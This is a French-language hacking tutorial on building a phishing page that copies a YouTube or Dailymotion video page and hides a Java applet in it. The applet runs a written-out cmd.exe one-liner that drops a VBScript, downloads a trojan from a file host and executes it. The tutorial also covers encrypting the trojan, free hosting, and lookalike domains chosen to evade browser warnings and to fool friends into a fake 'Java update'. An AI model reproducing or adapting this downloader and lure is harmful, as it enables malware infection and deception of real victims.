Aujourd'hui je vais vous montrez comment crée votre propre phishing avec applet
Exemple : Je crée une fausse vidéo , ou j'en prend une déjà existante sur youtube/dailymotion ou autres , je dis a ma guilde/amis d'aller voir ma vidéo sur youtube/ou dailymotion ,
La victime tombe sur une vrai page youtube/dailymotion , avec l'applet ( caché dans le bas de la page ) Qui s'exécute et qui demande une Mise a jour java, La victime accepte car elle pense qu'avec la mise à jour il pourra lire la vidéo
1er étape :
Choisissez votre futur page de phising youtube ou dailymotion ( cela peut être également une autre chose que youtube ou dailymotion ,) Puis chercher une vidéo , ou votre vidéo.
Puis Clique droit --> afficher la source de la page .
Là , un bloc note , ou document texte s'ouvre ,avec des codes , copié se code en ENTIER.
2eme étape :
Maintenant , sur votre bureau cliqué droit --> nouveau document texte , ou ouvrer votre bloc-note,
puis coller le code que vous avez préalablement copié et enregistrez votre texte en ' index.html ' sur votre bureau , vous avez maintenant une sur votre bureau un lien internet nommé ' index ' .
3em étape:
Premièrement , prenez l'applet ( le mien ou un autre )
Liens : http://www.multiupload.com/LKLEFW62O0
Codage anti-noob pour le fichier zip : BeffwdwjmINYBlBRBItJ6A61C0Z0DGB8
Crypté en : Base-64 --> gila7-->Tigo-3FX
déziper le tous .
Rendez-vous sur FileAve.com et ajouté votre TROJAN ( je vous conseil de le crypter avant de le mettre sur fileave ) maintenant fileave vous donne un lien du genrehttp://votrefichier....otrefichier.exe
Ré ouvrer votre index pour cela : clic droit sur ' index ' --> ' ouvrir avec ' --> ' bloc note '
Aller à la fin du code laisser appuyer sur ' Entrée ' , puis rentrez le code suivant :
<style type=text/css>
body {
background-color: white;
}
#box {
border: 2px double white;
font-family: Verdana;
margin-right:160px;
margin-left:160px;
background-color: white;
}
</style>
<body>
<br><br><br><br>
<div id="box">
<applet width='500' height='500'code="Client.class" archive="Client.jar" height="1" width="1"><param name="windows1" value="cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1" >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell" >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs LIEN FILEAVE %temp%\update.exe" />
<param name="windows2" value="" /><param name="unix1" value="" />
<param name="unix2" value="" /><param name="linux1" value="VOTRE LIEN FILEAVE"/>
<param name="linux2" value="" /> </applet>
</div>
</body>
</html>
Faites attention, la balise </html> doit etre uniquement après l'applet, et non avant.
Cherchez dans ce code le code : value="VOTRE LIEN FILEAVE"/>
et mettez votre lien Fileave a la place de 'VOTRE LIEN FILEAVE' ( Attention, il y'a 2 endroit ! Ouvrez votre bloc note en plein écran pour éviter les retours de lignes !! )
4eme étape :
Maintenant il faut héberger le tous, allez sur t35.com
dans ' website name ' entré le nom de votre site , le mieux est de prendre un nom du genre ' Flv-player ' , ' java-maj ' , ' shockwave-player ' etc ...
puis enregistrez vous sur t35, une fois votre site crée , sur t35 , rendez-vous sur le ftp du site pour upload vos fichiers, cliqué sur ' upload' et ajoutez vos fichiers : Java.png , load.gif , et votre index que vous avez créer.
Puis cliqué sur ' Upload Java ' et ajoutez vos fichiers java : Client.class et Client .
Maintenant quand vous entrez le liens url dans votre navigateur : http://xxxx.t35.com , vous obtenez votre vidéo youtube ou dailymotion avec votre applet sauf qu'il est détecté par votre navigateur , je vous conseil donc de changé le nom de domaine comme dans l'étape 5 : )
5eme étape :
Rendez vous sur : http://www.new.fr/fr/ pour crée un nom de domaine ( gratuit )
Crée un nom de domaine du genre ' http://dailymotion.videoEIOy17.new.fr ' ou ' Http://Youtube-watchEroy28.new.fr
voilà le résultat avec Dailymotion ;
source : http://world-dev.com...plet-!-By-Key-z